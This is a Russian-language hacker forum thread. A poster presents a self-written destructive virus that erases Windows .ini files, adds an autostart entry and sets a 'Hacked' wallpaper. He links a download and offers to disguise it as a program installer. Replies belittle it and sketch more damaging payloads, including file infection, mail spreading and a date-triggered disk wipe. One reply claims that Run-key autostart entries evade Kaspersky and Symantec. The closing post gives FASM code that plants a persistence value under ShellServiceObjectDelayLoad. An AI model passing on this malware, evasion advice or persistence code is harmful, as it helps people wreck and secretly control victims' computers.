Привет всем, вот наконец-то я в сети, эх. Вот набросал вирусняк(просто видел сравнительно недавно как кто-то кидал на форум вир свой, решил сделать также свой). Его действия: 1)в папке windows стирает все содержимое файлов ini и дописывает строку:"It is marked with a virus the Sn@k3'a - "Hunter snake's" 2)Далее делает файл с знаменитым кодо" svhost.exe -s"в папочке по пути "C:\Documents and Settings\имя пользователя, который собственно и запустил вирус\Главное меню\Программы\Автозагрузка" З.Ы. хотел вообщем в реестре заместит, но если винда всеровно будет не рабочая, то зачем....Тем более он в таком случае будет палиться каспером 3)и на последок решил оставить красивую картинку на рабочем столе =) с пожеланием и так всем известной словом Hacked =))). не удержался ))). Вообщем так могу также данную программу наростить до любых размеров(в разумных пределах, у меня модем/в архиве ~40 кб, без него ~150 кб). Можно спрятать с любой программой, т.е. имитировать её установщик, нет проблем, крч ваши пожелания и добавления. Это не первый мой вирус, эх остальное убыло в небытие. Вообщем зацените вирус Hunter Snake's =). скачать >>>
Вирьмейкеры йопта.... как писал Bug(o)r , это может сделать любой кто прочитает 50-70 страниц учебника по программированию...
Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...
Ну и порожняк ! Ну вы бы еще bat-файлы с командами типа del *.* выкладывали ! И почитай 29A чтобы иметь хоть смутное представление о том ЧТО ТАКОЕ ВИРУС !
Хм,да ладно,человек может начинающий,решил выложить,узнать на верном ли он пути,а вы его грузите.Может следующий будет лучше...
Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.
Code: ;use fasm to compile this sheat include 'win32ax.inc' .code start: push eax invoke RegOpenKeyEx,\ HKEY_LOCAL_MACHINE,\ "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad",\ 0,\ KEY_READ+KEY_WRITE,\ esp pop eax invoke RegSetValueEx,\ eax,\ "netagent",\ 0,\ REG_SZ,\ "test",\ 4 invoke MessageBox,HWND_DESKTOP,"Программа 123 успешно помешена в автозагрузку.","Готово ...",MB_OK invoke ExitProcess,0 .end start зы сори шо нефтему